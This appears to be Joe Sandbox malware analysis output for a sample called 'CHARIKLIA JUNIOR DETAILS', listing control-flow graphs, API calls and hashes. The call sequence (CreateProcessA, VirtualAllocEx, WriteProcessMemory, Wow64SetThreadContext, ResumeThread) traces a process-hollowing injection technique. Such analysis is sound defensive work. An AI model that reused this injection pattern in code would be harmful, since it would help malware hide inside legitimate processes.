5837ae1 21759->21760 21760->21760 21761 5837c46 CreateProcessA 21760->21761 21762 5837ca3 21761->21762 21764 5837589 ResumeThread 21763->21764 21766 58375f9 21764->21766 21766->21709 21768 58375c8 ResumeThread 21767->21768 21770 58375f9 21768->21770 21770->21709 21772 583762f 21771->21772 21772->21771 21773 583769d Wow64SetThreadContext 21772->21773 21774 58376c5 21773->21774 21774->21713 21776 583767d Wow64SetThreadContext 21775->21776 21778 58376c5 21776->21778 21778->21713 21780 5837818 WriteProcessMemory 21779->21780 21782 583786f 21780->21782 21782->21717 21784 58377d0 WriteProcessMemory 21783->21784 21786 583786f 21784->21786 21786->21717 21788 5837750 VirtualAllocEx 21787->21788 21790 583778d 21788->21790 21790->21744 21792 5837750 VirtualAllocEx 21791->21792 21794 583778d 21792->21794 21794->21744 21796 583790b ReadProcessMemory 21795->21796 21798 583794f 21796->21798 21798->21752 21800 583790b ReadProcessMemory 21799->21800 21802 583794f 21800->21802 21802->21752 21803 1154668 21804 1154672 21803->21804 21808 1154758 21803->21808 21814 1153e34 21804->21814 21806 115468d 21809 115477d 21808->21809 21818 1154858 21809->21818 21822 11549ca 21809->21822 21827 1154868 21809->21827 21810 1154787 21810->21804 21815 1153e3f 21814->21815 21835 1155c24 21815->21835 21817 1156faf 21817->21806 21820 115488f 21818->21820 21819 11549b8 21819->21810 21820->21819 21831 11544b4 21820->21831 21823 11549df 21822->21823 21826 11548d1 21822->21826 21823->21810 21824 11549b8 21824->21810 21825 11544b4 CreateActCtxA 21825->21826 21826->21824 21826->21825 21829 115488f 21827->21829 21828 11549b8 21828->21810 21829->21828 21830 11544b4 CreateActCtxA 21829->21830 21830->21829 21832 11558f8 CreateActCtxA 21831->21832 21834 11559bb 21832->21834 21836 1155c2f 21835->21836 21839 1155c44 21836->21839 21838 1157055 21838->21817 21840 1155c4f 21839->21840 21843 1155c74 21840->21843 21842 115713a 21842->21838 21844 1155c7f 21843->21844 21847 1155ca4 21844->21847 21846 115722d 21846->21842 
21848 1155caf 21847->21848 21850 115852b 21848->21850 21853 115abda 21848->21853 21849 1158569 21849->21846 21850->21849 21857 115ccc8 21850->21857 21862 115ac00 21853->21862 21866 115ac10 21853->21866 21854 115abee 21854->21850 21859 115ccf9 21857->21859 21858 115cd1d 21858->21849 21859->21858 21874 115ce77 21859->21874 21878 115ce88 21859->21878 21863 115ac10 21862->21863 21869 115ad08 21863->21869 21864 115ac1f 21864->21854 21868 115ad08 GetModuleHandleW 21866->21868 21867 115ac1f 21867->21854 21868->21867 21870 115ad3c 21869->21870 21871 115ad19 21869->21871 21870->21864 21871->21870 21872 115af40 GetModuleHandleW 21871->21872 21873 115af6d 21872->21873 21873->21864 21876 115ce95 21874->21876 21875 115cecf 21875->21858 21876->21875 21882 115ba40 21876->21882 21880 115ce95 21878->21880 21879 115cecf 21879->21858 21880->21879 21881 115ba40 GetModuleHandleW 21880->21881 21881->21879 21883 115ba4b 21882->21883 21885 115dbe8 21883->21885 21886 115d23c 21883->21886 21885->21885 21887 115d247 21886->21887 21888 1155ca4 GetModuleHandleW 21887->21888 21889 115dc57 21888->21889 21889->21885
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae7512bc46d80bcefe8a34f107f2ebaf1c820555b464b4755b81c40c75497490
                                                              • Instruction ID: f26a8f17125636be516c50511ff7322464a9d85532267d3597f81d89c8679f14
                                                              • Opcode Fuzzy Hash: ae7512bc46d80bcefe8a34f107f2ebaf1c820555b464b4755b81c40c75497490
                                                              • Instruction Fuzzy Hash: 08E1DC717017048FDB29DB79C460BAEBBFAAF89305F1444A9E856DB290CB35EC01CB91

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D01E
                                                              • GetCurrentThread.KERNEL32 ref: 0115D05B
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D098
                                                              • GetCurrentThreadId.KERNEL32 ref: 0115D0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: afcf35854b983ff479568423bc3defe331eb9c7c64f2066d15a9046874d5053c
                                                              • Instruction ID: 9fd1795f447deb515a808023d1d3d064708e9513cca98ee41b07b7f06f8f27b3
                                                              • Opcode Fuzzy Hash: afcf35854b983ff479568423bc3defe331eb9c7c64f2066d15a9046874d5053c
                                                              • Instruction Fuzzy Hash: B15176B090134ACFDB58DFA9D948BDEBBF1BF88314F208599E419A72A0D7345844CB26

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D01E
                                                              • GetCurrentThread.KERNEL32 ref: 0115D05B
                                                              • GetCurrentProcess.KERNEL32 ref: 0115D098
                                                              • GetCurrentThreadId.KERNEL32 ref: 0115D0F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 7fd7c5acae3e1fe556d7d37b4ba6ce4dfa01b07dd2d16be922f80b57550b85e0
                                                              • Instruction ID: d7ba63b642a3180c0afe34da9702ecfe71ed28f4c6d10495870ce77fc7a0efb8
                                                              • Opcode Fuzzy Hash: 7fd7c5acae3e1fe556d7d37b4ba6ce4dfa01b07dd2d16be922f80b57550b85e0
                                                              • Instruction Fuzzy Hash: 2E5156B090034ACFDB58DFAAD548BDEBBF1BF88314F208559E419A7360D7345944CB66

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 45 5837a4d-5837aed 47 5837b26-5837b46 45->47 48 5837aef-5837af9 45->48 55 5837b48-5837b52 47->55 56 5837b7f-5837bae 47->56 48->47 49 5837afb-5837afd 48->49 50 5837b20-5837b23 49->50 51 5837aff-5837b09 49->51 50->47 53 5837b0b 51->53 54 5837b0d-5837b1c 51->54 53->54 54->54 57 5837b1e 54->57 55->56 58 5837b54-5837b56 55->58 62 5837bb0-5837bba 56->62 63 5837be7-5837ca1 CreateProcessA 56->63 57->50 60 5837b79-5837b7c 58->60 61 5837b58-5837b62 58->61 60->56 64 5837b66-5837b75 61->64 65 5837b64 61->65 62->63 66 5837bbc-5837bbe 62->66 76 5837ca3-5837ca9 63->76 77 5837caa-5837d30 63->77 64->64 67 5837b77 64->67 65->64 68 5837be1-5837be4 66->68 69 5837bc0-5837bca 66->69 67->60 68->63 71 5837bce-5837bdd 69->71 72 5837bcc 69->72 71->71 73 5837bdf 71->73 72->71 73->68 76->77 87 5837d32-5837d36 77->87 88 5837d40-5837d44 77->88 87->88 91 5837d38 87->91 89 5837d46-5837d4a 88->89 90 5837d54-5837d58 88->90 89->90 92 5837d4c 89->92 93 5837d5a-5837d5e 90->93 94 5837d68-5837d6c 90->94 91->88 92->90 93->94 95 5837d60 93->95 96 5837d7e-5837d85 94->96 97 5837d6e-5837d74 94->97 95->94 98 5837d87-5837d96 96->98 99 5837d9c 96->99 97->96 98->99 100 5837d9d 99->100 100->100
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05837C8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 58aca948a08b0ead8e5d5e2192544edc58c375c7f70e52d2151c23f098b9edfa
                                                              • Instruction ID: 2b6d9bafb91aff47e7bbde6f5d6cdce03729fbbc8d8286b01e73169c82637e51
                                                              • Opcode Fuzzy Hash: 58aca948a08b0ead8e5d5e2192544edc58c375c7f70e52d2151c23f098b9edfa
                                                              • Instruction Fuzzy Hash: D3A14AB1D00219DFEB10DF68C841BADBBB2FF44314F1485A9E819E7240DB759A85CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 102 5837a58-5837aed 104 5837b26-5837b46 102->104 105 5837aef-5837af9 102->105 112 5837b48-5837b52 104->112 113 5837b7f-5837bae 104->113 105->104 106 5837afb-5837afd 105->106 107 5837b20-5837b23 106->107 108 5837aff-5837b09 106->108 107->104 110 5837b0b 108->110 111 5837b0d-5837b1c 108->111 110->111 111->111 114 5837b1e 111->114 112->113 115 5837b54-5837b56 112->115 119 5837bb0-5837bba 113->119 120 5837be7-5837ca1 CreateProcessA 113->120 114->107 117 5837b79-5837b7c 115->117 118 5837b58-5837b62 115->118 117->113 121 5837b66-5837b75 118->121 122 5837b64 118->122 119->120 123 5837bbc-5837bbe 119->123 133 5837ca3-5837ca9 120->133 134 5837caa-5837d30 120->134 121->121 124 5837b77 121->124 122->121 125 5837be1-5837be4 123->125 126 5837bc0-5837bca 123->126 124->117 125->120 128 5837bce-5837bdd 126->128 129 5837bcc 126->129 128->128 130 5837bdf 128->130 129->128 130->125 133->134 144 5837d32-5837d36 134->144 145 5837d40-5837d44 134->145 144->145 148 5837d38 144->148 146 5837d46-5837d4a 145->146 147 5837d54-5837d58 145->147 146->147 149 5837d4c 146->149 150 5837d5a-5837d5e 147->150 151 5837d68-5837d6c 147->151 148->145 149->147 150->151 152 5837d60 150->152 153 5837d7e-5837d85 151->153 154 5837d6e-5837d74 151->154 152->151 155 5837d87-5837d96 153->155 156 5837d9c 153->156 154->153 155->156 157 5837d9d 156->157 157->157
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05837C8E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: c5763f758f0feb1e948fb2fc7485b2f7eecefc387f272670ea0baee5f49d78a1
                                                              • Instruction ID: bfa701259e6b44cc20f2064bb370527e848ab1c3d41be6bedfdbae9857f07ac2
                                                              • Opcode Fuzzy Hash: c5763f758f0feb1e948fb2fc7485b2f7eecefc387f272670ea0baee5f49d78a1
                                                              • Instruction Fuzzy Hash: 59915BB1D00219DFEB14DF69C841BADBBB2FF48314F1485A9D819E7240DB749A85CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 159 115ad08-115ad17 160 115ad43-115ad47 159->160 161 115ad19-115ad26 call 115a02c 159->161 163 115ad49-115ad53 160->163 164 115ad5b-115ad9c 160->164 167 115ad3c 161->167 168 115ad28 161->168 163->164 170 115ad9e-115ada6 164->170 171 115ada9-115adb7 164->171 167->160 219 115ad2e call 115af90 168->219 220 115ad2e call 115afa0 168->220 170->171 172 115adb9-115adbe 171->172 173 115addb-115addd 171->173 175 115adc0-115adc7 call 115a038 172->175 176 115adc9 172->176 178 115ade0-115ade7 173->178 174 115ad34-115ad36 174->167 177 115ae78-115aef4 174->177 180 115adcb-115add9 175->180 176->180 209 115aef6-115af1e 177->209 210 115af20-115af38 177->210 181 115adf4-115adfb 178->181 182 115ade9-115adf1 178->182 180->178 185 115adfd-115ae05 181->185 186 115ae08-115ae11 call 115a048 181->186 182->181 185->186 190 115ae13-115ae1b 186->190 191 115ae1e-115ae23 186->191 190->191 192 115ae25-115ae2c 191->192 193 115ae41-115ae45 191->193 192->193 195 115ae2e-115ae3e call 115a058 call 115a068 192->195 217 115ae48 call 115b270 193->217 218 115ae48 call 115b2a0 193->218 195->193 198 115ae4b-115ae4e 200 115ae71-115ae77 198->200 201 115ae50-115ae6e 198->201 201->200 209->210 212 115af40-115af6b GetModuleHandleW 210->212 213 115af3a-115af3d 210->213 214 115af74-115af88 212->214 215 115af6d-115af73 212->215 213->212 215->214 217->198 218->198 219->174 220->174
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 23b46dd02191ea626a14a92bec83c4a25f3fead273f90c084b98e5cd6e629b14
                                                              • Instruction ID: 0810a10b8e2a63901d2a360140fc7c11744f76c89860e71fb24250727bc794e5
                                                              • Opcode Fuzzy Hash: 23b46dd02191ea626a14a92bec83c4a25f3fead273f90c084b98e5cd6e629b14
                                                              • Instruction Fuzzy Hash: C8812770A00B05CFDB68DF29E44075ABBF5FF88304F108A2DD99A9BA50D775E849CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 221 11558ec-11559b9 CreateActCtxA 223 11559c2-1155a1c 221->223 224 11559bb-11559c1 221->224 231 1155a1e-1155a21 223->231 232 1155a2b-1155a2f 223->232 224->223 231->232 233 1155a31-1155a3d 232->233 234 1155a40 232->234 233->234 236 1155a41 234->236 236->236
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 011559A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 665f3b15562220381e61ce50a6b3c5860b4919f2674fb528c82244d9803a7a6b
                                                              • Instruction ID: 03ce04725c235bcd93a017be5b75468fb42b6a0fcc099bead9f1f032302ae1c6
                                                              • Opcode Fuzzy Hash: 665f3b15562220381e61ce50a6b3c5860b4919f2674fb528c82244d9803a7a6b
                                                              • Instruction Fuzzy Hash: F14113B1C00319CFEB24DFAAC8847DEBBB6BF89704F20816AD419AB251DB755946CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 237 11544b4-11559b9 CreateActCtxA 240 11559c2-1155a1c 237->240 241 11559bb-11559c1 237->241 248 1155a1e-1155a21 240->248 249 1155a2b-1155a2f 240->249 241->240 248->249 250 1155a31-1155a3d 249->250 251 1155a40 249->251 250->251 253 1155a41 251->253 253->253
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 011559A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 78e82f68c676a6ace8607eec38fd530ed0491d48d46dc52e904d95e1f29f41bb
                                                              • Instruction ID: d2b92670ed13fb5d59b7a435f1fa3a0c8fc0db0026b9875e0a6e3c53ef1bdf09
                                                              • Opcode Fuzzy Hash: 78e82f68c676a6ace8607eec38fd530ed0491d48d46dc52e904d95e1f29f41bb
                                                              • Instruction Fuzzy Hash: 8841F5B0D0071DCFDB68DFAAC84478EBBB6BF88704F208069D419AB251DB756945CF90

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 58377c8-583781e, 5837820-583782c, 583782e-583786d [WriteProcessMemory], 583786f-5837875, 5837876-58378a6
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05837860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 3804150fed0810ef92f07d6e600ca96dd87323d0dacb206171bd691fbb0bcb19
                                                              • Instruction ID: 29facc14817b17202e18680a8d2174b3df40a0f7b63232253ef860f577973599
                                                              • Opcode Fuzzy Hash: 3804150fed0810ef92f07d6e600ca96dd87323d0dacb206171bd691fbb0bcb19
                                                              • Instruction Fuzzy Hash: 4F2157B1D003499FDB10DFAAC881BDEBBF5FF48310F50842AE919A7240C778A944CBA4

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 583762f and 5837630-5837634 (loop), 5837636-5837683, 5837685-5837691, 5837693-5837696, 583769d-58376c3 [Wow64SetThreadContext], 58376c5-58376cb, 58376cc-58376fc
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058376B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 5c8a6761a56c1648b04cba03d82b174d67f23e096e08be17cd9cc231e5d03652
                                                              • Instruction ID: ccae07ad1c5b7b19ffb6fe32dd2bdf9c6f6f48ab0d8d3618705f62a5d53201a6
                                                              • Opcode Fuzzy Hash: 5c8a6761a56c1648b04cba03d82b174d67f23e096e08be17cd9cc231e5d03652
                                                              • Instruction Fuzzy Hash: 9E217CB19003099FDB10DFAAC9857EEBBF5EF48210F548429D919E7240DB789945CFA0

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 115d5e8-115d5ee, 115d5f0-115d684 [DuplicateHandle], 115d686-115d68c, 115d68d-115d6aa
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0115D677
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 791d8ccce490ba9e3b1bb4c6a350c4ed4798582c80d2014222da8fa6908b6e79
                                                              • Instruction ID: 7f55c661eb5daecdb59e1e68774e8ce97f04a447323ea8a92b709437df6031d5
                                                              • Opcode Fuzzy Hash: 791d8ccce490ba9e3b1bb4c6a350c4ed4798582c80d2014222da8fa6908b6e79
                                                              • Instruction Fuzzy Hash: 823148B5800249DFDB10CFAAD980ADEFFF4AB49320F14415AE958A7250C378A941CF61

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 58377d0-583781e, 5837820-583782c, 583782e-583786d [WriteProcessMemory], 583786f-5837875, 5837876-58378a6
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05837860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: a7bbf6db2b5277a127c14c9b6b7191348f93f8d8048e8ec371f42fad69f6f3bd
                                                              • Instruction ID: 9a42e750f1bcf6bfef370c24f09a7c0c14758495fb801c475c73ae7dd3d70ac5
                                                              • Opcode Fuzzy Hash: a7bbf6db2b5277a127c14c9b6b7191348f93f8d8048e8ec371f42fad69f6f3bd
                                                              • Instruction Fuzzy Hash: C92125B59003499FDB10DFAAC885BDEBBF5FF48310F50842AE919A7240C778A944CBA4

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 58378b8-583794d [ReadProcessMemory], 583794f-5837955, 5837956-5837986
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05837940
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: e587a951d8d185a70af53a4c9dd3497b61fde1f51003a94fa3cdab7eba5b63e5
                                                              • Instruction ID: 6f54ef92ba0aacafcd89870a45c7103ac779e9c87f3a502a4a11652c22358048
                                                              • Opcode Fuzzy Hash: e587a951d8d185a70af53a4c9dd3497b61fde1f51003a94fa3cdab7eba5b63e5
                                                              • Instruction Fuzzy Hash: F9214AB1C0034A9FDB10DFA9C881BDEBBF5FF48310F548429E919A7240D7789905CBA0

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 5837638-5837683, 5837685-5837691, 5837693-58376c3 [Wow64SetThreadContext], 58376c5-58376cb, 58376cc-58376fc
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058376B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 2e5f3de7fc65fe89272896515b3ef66cee82ccca30e5f8dcd291598ff5958a65
                                                              • Instruction ID: fd1ec8e9864ca6142151fec64dadb3087fcd8ded16b86c108c7b4575de7cbce1
                                                              • Opcode Fuzzy Hash: 2e5f3de7fc65fe89272896515b3ef66cee82ccca30e5f8dcd291598ff5958a65
                                                              • Instruction Fuzzy Hash: 872138B19003098FDB10DFAAC8857AEBBF5EF88310F548429D919A7240DB789944CFA4

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 58378c0-583794d [ReadProcessMemory], 583794f-5837955, 5837956-5837986
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05837940
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: ad321e392328623bc696dda2d8216889a0e5070483c639fa37fd3059de0232df
                                                              • Instruction ID: 0ffcf4d12724ae03a36ff2d0c3e2f95b76b36ffc7d498d9590571f936632b6ad
                                                              • Opcode Fuzzy Hash: ad321e392328623bc696dda2d8216889a0e5070483c639fa37fd3059de0232df
                                                              • Instruction Fuzzy Hash: 092128B18003499FDB10DFAAC881BDEFBF5FF48320F508429E959A7240D7789904CBA4

                                                              Control-flow Graph (rendered graph not reproduced; basic blocks in address order, API call site marked): 115d5f0-115d684 [DuplicateHandle], 115d686-115d68c, 115d68d-115d6aa
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0115D677
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 6a2885f3da762c55876e09d3e76666fc4d322b3112738d152012c1c5f6612e5e
                                                              • Instruction ID: eb2564282d8f05a66395293453070f5bf09bf8f1e8675442ad137dcfcceac578
                                                              • Opcode Fuzzy Hash: 6a2885f3da762c55876e09d3e76666fc4d322b3112738d152012c1c5f6612e5e
                                                              • Instruction Fuzzy Hash: ED21E4B5900209DFDB10CFAAD984ADEFBF8FB48310F14841AE918A3350D374A944CF65
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0583777E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 81ab4e67d0117828d3e19d253921e8c9f52e0151f76b6447663a5680dd709061
                                                              • Instruction ID: 4537a6adc699f83e1b1241e9dc34b7da1015a635fe8b54b610e025b619df557f
                                                              • Opcode Fuzzy Hash: 81ab4e67d0117828d3e19d253921e8c9f52e0151f76b6447663a5680dd709061
                                                              • Instruction Fuzzy Hash: FE1126B68003499FDB10DFAAC945BDEBBF5EF48320F148819E919A7250CB799944CFA0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0583777E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: e3c5acf4884e3452c65304e95ffc0727cf49b87437390fb6ea38356f6d3fcf94
                                                              • Instruction ID: 18df9940f2e4e435358074c8af30ffe7832b2b7e65b651caf660a431bbfabf6b
                                                              • Opcode Fuzzy Hash: e3c5acf4884e3452c65304e95ffc0727cf49b87437390fb6ea38356f6d3fcf94
                                                              • Instruction Fuzzy Hash: E31134758003499FDB10DFAAC845BDFBBF5EF88720F148819E919A7250CB79A944CFA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 4d2f2f344800f3bc72d22a45df155e6c22b35e17098b7b111ef3a5bbd9690607
                                                              • Instruction ID: 3b4ec98a0fdd933351f26caa384b9465159743b102daabf4d62936a717ae9b37
                                                              • Opcode Fuzzy Hash: 4d2f2f344800f3bc72d22a45df155e6c22b35e17098b7b111ef3a5bbd9690607
                                                              • Instruction Fuzzy Hash: F5115BB18003498FDB10DFAAC8457DEFBF5EF88310F248429D519A7240DB759904CF94
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0cc0a73ffc8629c41bd50f82a00553d64fd7f17af21b8be6bc996618c75f6d30
                                                              • Instruction ID: 0c88c9298eb283e9fcacae8be446c7ef641e0326d4f663c16915d2dbdba22f7b
                                                              • Opcode Fuzzy Hash: 0cc0a73ffc8629c41bd50f82a00553d64fd7f17af21b8be6bc996618c75f6d30
                                                              • Instruction Fuzzy Hash: 36113AB19003498FDB14DFAAC8457DEFBF9EF88720F248419D519A7240CB75A944CF94
                                                              APIs
